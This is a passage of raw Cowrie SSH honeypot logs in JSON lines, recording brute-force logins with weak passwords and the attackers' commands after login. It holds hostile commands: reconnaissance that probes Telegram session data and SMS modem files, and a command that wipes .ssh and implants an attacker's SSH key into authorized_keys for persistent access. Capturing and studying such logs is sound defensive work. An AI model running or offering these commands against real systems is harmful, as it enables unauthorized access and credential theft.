client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:02.362311Z","src_ip":"43.159.36.188","session":"189c604e6f01"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:02.561666Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"2025","message":"login attempt [ubuntu/2025] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:03.421197Z","src_ip":"43.159.36.188","session":"189c604e6f01"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:32:03.641495Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:03.817856Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-31T05:32:03.818707Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-31T05:32:03.819460Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:03.899416Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:04.121591Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-31T05:32:04.122305Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:04.202055Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:04.425728Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T05:32:04.426462Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:04.507231Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:04.684402Z","src_ip":"43.159.36.188","session":"189c604e6f01"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:04.727594Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-31T05:32:04.728379Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:04.813752Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:05.034205Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-31T05:32:05.034912Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:05.115211Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:05.733861Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-31T05:32:05.734601Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:05.818119Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:05.997299Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-31T05:32:05.998012Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:06.080817Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:06.310030Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-31T05:32:06.310867Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:06.421983Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47880,"dst_ip":"1.2.3.4","dst_port":22,"session":"3608f05ebd05","protocol":"ssh","message":"New connection: 212.227.235.229:47880 (1.2.3.4:22) [session: 3608f05ebd05]","sensor":"my-vps","timestamp":"2025-08-31T05:32:06.517883Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:06.601542Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-31T05:32:06.602247Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:06.682645Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.login.failed","username":"test1","password":"1234567","message":"login attempt [test1/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:06.953483Z","src_ip":"212.227.235.229","session":"cf9bd62ca67a"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:08.113980Z","src_ip":"212.227.235.229","session":"cf9bd62ca67a"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:08.394814Z","src_ip":"212.227.235.229","session":"c018819ade1c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"112","message":"login attempt [admin/112] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:09.904382Z","src_ip":"212.227.235.229","session":"ccc69d0eb4f6"}
{"eventid":"cowrie.session.closed","duration":"13.0","message":"Connection lost after 13.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:11.086482Z","src_ip":"212.227.235.229","session":"ccc69d0eb4f6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:32:12.205111Z","src_ip":"212.227.235.229","session":"3608f05ebd05"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:32:12.206207Z","src_ip":"212.227.235.229","session":"3608f05ebd05"}
{"eventid":"cowrie.session.closed","duration":"77.8","message":"Connection lost after 77.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:13.345134Z","src_ip":"212.227.235.229","session":"c018819ade1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52200,"dst_ip":"1.2.3.4","dst_port":22,"session":"83c2573ed610","protocol":"ssh","message":"New connection: 212.227.125.160:52200 (1.2.3.4:22) [session: 83c2573ed610]","sensor":"my-vps","timestamp":"2025-08-31T05:32:21.686381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:32:22.257522Z","src_ip":"212.227.125.160","session":"83c2573ed610"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:32:22.294838Z","src_ip":"212.227.125.160","session":"83c2573ed610"}
{"eventid":"cowrie.login.failed","username":"test1","password":"1234567","message":"login attempt [test1/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:24.454071Z","src_ip":"212.227.125.160","session":"83c2573ed610"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52750,"dst_ip":"1.2.3.4","dst_port":22,"session":"30abe7bf09b5","protocol":"ssh","message":"New connection: 212.227.235.229:52750 (1.2.3.4:22) [session: 30abe7bf09b5]","sensor":"my-vps","timestamp":"2025-08-31T05:32:26.017771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:26.019955Z","src_ip":"212.227.235.229","session":"30abe7bf09b5"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:26.081027Z","src_ip":"212.227.125.160","session":"83c2573ed610"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:26.269111Z","src_ip":"212.227.235.229","session":"30abe7bf09b5"}
{"eventid":"cowrie.login.failed","username":"remote","password":"12345678","message":"login attempt [remote/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:27.292794Z","src_ip":"212.227.235.229","session":"30abe7bf09b5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:28.549377Z","src_ip":"212.227.235.229","session":"30abe7bf09b5"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":41340,"dst_ip":"1.2.3.4","dst_port":22,"session":"b83571796677","protocol":"ssh","message":"New connection: 170.64.166.123:41340 (1.2.3.4:22) [session: b83571796677]","sensor":"my-vps","timestamp":"2025-08-31T05:32:28.781104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:28.782084Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:29.057925Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.login.success","username":"root","password":"11235813","message":"login attempt [root/11235813] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:32:30.197699Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:30.769085Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:32:30.769799Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:32:30.770861Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:31.046790Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:31.655275Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:32:31.655980Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:32:31.933075Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:31.933963Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":41346,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8d8ffc708b7","protocol":"ssh","message":"New connection: 170.64.166.123:41346 (1.2.3.4:22) [session: b8d8ffc708b7]","sensor":"my-vps","timestamp":"2025-08-31T05:32:32.206156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:32.206920Z","src_ip":"170.64.166.123","session":"b8d8ffc708b7"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"mongodb","message":"login attempt [mongodb/mongodb] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:32.291187Z","src_ip":"212.227.235.229","session":"3608f05ebd05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS